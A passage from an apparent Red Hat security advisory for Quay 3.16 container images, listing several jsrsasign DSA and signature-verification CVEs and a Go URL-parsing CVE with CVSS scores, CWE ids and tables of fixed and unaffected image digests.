Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-4599

A flaw was found in jsrsasign. An attacker can exploit an incomplete comparison vulnerability in the getRandomBigIntegerZeroToMax and getRandomBigIntegerMinToMax functions. By manipulating incorrect comparison checks, an attacker can bias the Digital Signature Algorithm (DSA) nonces during signature generation. This allows the attacker to recover the private key, leading to a critical security compromise.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-338 - Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-4600

A flaw was found in jsrsasign. An attacker can exploit improper verification of cryptographic signatures by supplying malicious domain parameters during the Digital Signature Algorithm (DSA) validation process. This allows the attacker to forge DSA signatures or X.509 certificates, which would then be accepted as legitimate, potentially leading to unauthorized access or data manipulation.

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-4601

A flaw was found in jsrsasign. An attacker can exploit a missing cryptographic step in the Digital Signature Algorithm (DSA) signing process, specifically within the KJUR.crypto.DSA.signWithMessageHash function. By manipulating the signature generation to force specific values, the library emits an invalid signature without retrying. This vulnerability allows an attacker to recover the private key used for signing.

8.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

CWE-325 - Missing Cryptographic Step

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-4602

A flaw was found in jsrsasign. A remote attacker can exploit an incorrect conversion between numeric types by providing a negative exponent to the `modPow` function. This vulnerability can force the computation of incorrect modular inverses, which ultimately allows an attacker to bypass signature verification.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-681 - Incorrect Conversion between Numeric Types

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-25679

The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1286 - Improper Validation of Syntactic Correctness of Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
